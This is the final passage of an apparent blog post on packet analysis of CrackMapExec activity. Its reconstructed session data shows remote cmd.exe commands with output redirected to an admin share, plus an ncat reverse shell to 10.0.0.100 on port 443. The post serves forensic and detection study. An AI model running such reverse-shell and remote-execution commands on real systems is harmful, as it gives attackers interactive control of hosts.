...........p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd  1> \\127.0.0.1\C$\Windows\Temp\egHJIv 2>&1..C:\..I..........
....5....... h...r@....
.............................................................................................................................................................................................
....................0......................__PARAMETERS..cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1..C:\.Cg..........
....5..........WG......

Above we see from the rebuilt session that amongst other items, we see "ncat.exe" being executed with various arguments.

Ok. That's it for thist post.


References:
Wikipedia - ICMP protocol


Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis

No comments:

Post a Comment